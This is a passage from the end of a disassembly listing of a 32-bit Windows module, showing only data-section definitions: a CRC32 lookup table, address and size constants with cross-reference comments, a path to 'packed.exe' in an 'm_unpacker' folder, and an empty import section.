dword_100030F8 dd 0 ; DATA XREF: .text:10001611�r
; .text:10001666�r
dd 2 dup(0)
dword_10003104 dd 0 ; DATA XREF: .text:10001689�w
dd 86h dup(0)
dword_10003320 dd 0 ; DATA XREF: sub_10001AD0+9�o
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_10003720 dd 10004048h ; DATA XREF: .text:1000130A�w
; .text:1000131C�r
dword_10003724 dd 10004058h ; DATA XREF: .text:10001317�w
; .text:1000132E�r
dword_10003728 dd 10004058h ; DATA XREF: .text:10001339�w
; .text:10001344�r ...
dword_1000372C dd 320000h ; DATA XREF: .text:10001380�w
; .text:1000138B�r ...
dword_10003730 dd 1105Ch ; DATA XREF: .text:10001329�w
; .text:1000133E�r ...
dword_10003734 dd 20000h ; DATA XREF: .text:10001367�w
; .text:10001373�r ...
dword_10003738 dd 3200E8h ; DATA XREF: sub_100013CD+9�w
; sub_100013CD+2F�r ...
dword_1000373C dd 1000h ; DATA XREF: sub_100013CD+12�w
; sub_100013CD+3A�r ...
dword_10003740 dd 3 ; DATA XREF: sub_100013CD+1B�w
; sub_100013CD:loc_1000143E�r ...
dword_10003744 dd 3201E0h ; DATA XREF: sub_100013CD+29�w
; sub_100013CD+6B�r ...
dword_10003748 dd 3200E8h ; DATA XREF: .text:10001498�w
; .text:100014CE�r
dd 2 dup(0)
dword_10003754 dd 0C7000h ; DATA XREF: .text:100014A6�w
; .text:100014B2�r ...
dword_10003758 dd 340000h ; DATA XREF: .text:100014BF�w
; .text:100014C4�r ...
dword_1000375C dd 407000h ; DATA XREF: .text:100014C9�w
; .text:1000151E�r ...
dword_10003760 dd 400h ; DATA XREF: .text:100014D7�w
; .text:100014FC�r ...
dword_10003764 dd 3201E0h ; DATA XREF: .text:100014E5�w
dword_10003768 dd 3C00h ; DATA XREF: .text:10001566�w
; .text:10001573�w ...
dword_1000376C dd 0 ; DATA XREF: .text:1000161E�o
dword_10003770 dd 0C7000h ; DATA XREF: sub_100013CD+47�w
; sub_100013CD+60�w ...
dword_10003774 dd 65BEh ; DATA XREF: sub_100012A9+5�w
; sub_100012A9+2C�r
dword_10003778 dd 663Bh ; DATA XREF: sub_100012A9+16�w
; sub_100012A9+31�r
dword_1000377C dd 66A9h ; DATA XREF: sub_100012A9+27�w
; sub_100012A9+39�r
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: .text:100015C9�o
; .text:100015EB�o
align 4
dd 17h dup(0)
_data ends
; Section 5. (virtual address 00016000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 10016000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start